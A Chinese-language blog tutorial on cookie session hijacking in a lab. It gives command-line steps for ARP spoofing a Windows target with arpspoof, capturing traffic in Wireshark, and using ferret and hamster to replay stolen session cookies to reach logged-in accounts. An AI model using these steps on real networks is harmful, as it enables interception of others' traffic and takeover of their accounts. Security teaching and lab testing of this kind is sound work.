Cookie 会话劫持,进行重放攻击

测试环境

操作系统 IP地址
  操作机   Kali Linux 2018 192.168.43.95
  目标机   Windows 10 192.168.43.195

什么是Cookie !

Cookie的诞生多是为了弥补http 无状态协议的不足,Cookie本身只是服务器存储在用户端的一段数据,这段数据会记录着会话的状态。这其中包含很多,比如用户的登录状态,你一定会发现登录过某个网站之后下次重现打开这个网站,你的账户会仍然是登录的状态(类似与虚拟机中的快照),实际上这就是Cookie的功劳

因为Cookie本身只是一段数据,既然它存储在用户端可以使用,那么如果把它拿出来放到另一台计算机上,实际上同样可以回复某个会话状态,在如果某个会话状态中存在已经登录成功的账户,那么我们就可以使用这个Cookie进行重放攻击(如果你在看这篇文章相信不用在多解释cookie的原理)

会话劫持

1. 对目标及进行ARP欺骗以抓取流量

root@kali:~$ echo 1 > /proc/sys/net/ipv4/ip_forward
root@kali:~$ arpspoof -i wlan0 -t 192.168.43.195 -r 192.168.43.1

进行ARP欺骗,让43.195 的所有流量经过自己的主机去上网,这里43.1 是局域网的网关

2. 使用 wireshark 抓取数据

抓包的时间尽量长一些内容会多,7-10分钟就可以了

注意最后保存的格式不要错,现在我们在/root 下有一个“cookie.pcap”的文件,我们所需要的cookie 也在这个文件里边

重放会话

1. 安装ferret

root@kali:~$ dpkg --add-architecture i386 
root@kali:~$ apt-get update 
root@kali:~$ apt-get install ferret-sidejack:i386

2. 生成hamster.txt

root@kali:~$ ferret -r cookie.pcap

3. 开启hamster 服务

4. 访问hamster页面

将自己的浏览器手动配置代理,具体参数如上图,IP: 127.0.0.1 ,端口:1234

选中几个页面打开,能发现已经是登录成功的状态了

1 Comment

  1. 张♂运通 2018年6月21日 at 下午3:14

    好!




    59



    10

Leave a comment

电子邮件地址不会被公开。 必填项已用*标注